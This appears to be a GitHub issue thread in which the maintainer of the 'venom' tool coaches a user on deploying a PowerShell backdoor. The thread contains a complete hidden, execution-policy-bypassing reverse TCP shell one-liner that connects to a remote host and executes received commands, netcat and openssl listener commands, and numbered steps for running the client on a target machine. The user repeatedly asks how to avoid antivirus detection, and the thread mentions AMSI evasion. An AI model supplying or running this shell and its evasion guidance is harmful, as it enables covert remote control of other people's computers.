Structure of Update-KB457147.ps1

[Vedant-Bhalgama]

Hi r00t-3xp10it!

I just wanted to understand that in your powershyell script (Amsi Evasion File less stager one), Where are the Lhost and Lport values? And can you give me a good tutorial on how to make a backdoor in powershell?

Here is the screenshot of your powershell script.

[Vedant-Bhalgama]

Also I wanted to ask that for this powershell reverse shell, NetCat Listener will work or not? powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

[r00t-3xp10it]

• 1º - the 1º screenshot its not the payload (Client) [Reverse TCP Powershell Shell] .. its the dropper|launcher file that going to download/execute the payload (Client) ...

This is the payload (Client) [Reverse TCP Powershell Shell]

• 2º - yes netcat can be used to recive the connection back of that reverse shell .. But it will not work on venom amsi evasion 2º agent because it depends of SSL .. so.. to recive the connection back on the 2º agent its required one SSL listenner ..

openssl s_server -quiet -key key.pem -cert cert.pem -port <lport> <-- SSL handler|Listeneer

[Vedant-Bhalgama]

Ok!

And do you know any one liner payloads in Power Shell, I tried all which are available on Google an Github but they are getting detected. Or maybe if you can give me a source on Writing a Backdoor in Powershell?

[r00t-3xp10it]

How to make 'oneliners'

Powershell uses ; to Join commands get-date;Test-NetConnection|Select-Object -expandproperty InterfaceAlias

C++ uses ; to Join commands nret = recv(my_socket, (char *)startb, len - tret, 0);startb += nret;tret += nret

VBS uses : to Join commands Set objShell = CreateObject("Wscript.Shell"):objShell.Run "cmd.exe /c start calc.exe"

Bash uses && to Join commands echo "hello"&&echo "world"

Etc,etc,etc..

---

To writte tcp shells we need to study sockets in the language we are going to need ..

[Vedant-Bhalgama]

Are you having any sample backdoor which you can give me for now? In powershell

[r00t-3xp10it]

you can use this onelinner powershell reverse TCP shell you just need to change LHOST|LPORT settings and start one netcat listenner sudo nc -lvp <port-number-used-by-client>

[Vedant-Bhalgama]

OhK! So all i have to is to replace the LHOST and LPORT and run it with netcat

[Vedant-Bhalgama]

I found the code in the pic, But now do I have to copy all the lines from the

Build Reverse Powershell Shell to the echo writer.close socket.close?

Also can you explain this me a bit? How can I use this code? Because this is a bit confusing what to do!

[Vedant-Bhalgama]

Hi!

I copied your script to PowerShell ISE and it gave me errors like this

[r00t-3xp10it]

Offcourse it gives errors .. because some variable declarations are empty (none user inputs)

[Vedant-Bhalgama]

Ok, So now explain me in deep to what to do with this source code ??

[r00t-3xp10it]

its the Client ...

i advice you to use this oneliner insted .. https://github.com/r00t-3xp10it/venom/issues/65#issuecomment-664243226

[Vedant-Bhalgama]

Ok! I will use that client but, As it is giving me errors, What should I do? Should I run the Program in Kali Linux?? Please specify a bit more! (i AM EXTREMELY SORRY FOR DISTURBING YOU BECAUSE I AM NOT GOOD IN POWERSHELL)

[r00t-3xp10it]

this client only works againts MICROSOFT systems ....

• 1º - change the Client LHOST and LPORT variables
• 2º - in ATTACKER machine execute the listenner sudo nc -lvp <PORT-NUMBER-USED-BY-CLIENT>
• 3º - execute the client.ps1 on ISE (target machine)

[Vedant-Bhalgama]

Ok! I will try it tomorrow and tell you! And while changing the $lport and $lhost variables, Should I change it like this $10.0.2.4 $443

[r00t-3xp10it]

$ <--- its how we define an variable declaration in powershell so dont use it .. just change 192.168.1.2 (LHOST) and 4444 (LPORT)

---

example of PS variables

## define a variable
$myvariable = "hello world"

## print variable on screen
echo "$myvariable "

---

FInal Note

If you want to understand .. then help me in my projects like this guy have did ...

note-to-self

update meterpeter in venom and mabee add the client.exe|Server.exe build ??? (need to check if AV flags this now)

[Vedant-Bhalgama]

Hi! I used this one liner which you told earlier https://github.com/r00t-3xp10it/venom/issues/65#issuecomment-663805711 But it is getting detected, How can I use this script (Whic you made) https://github.com/r00t-3xp10it/venom/issues/65#issuecomment-664493775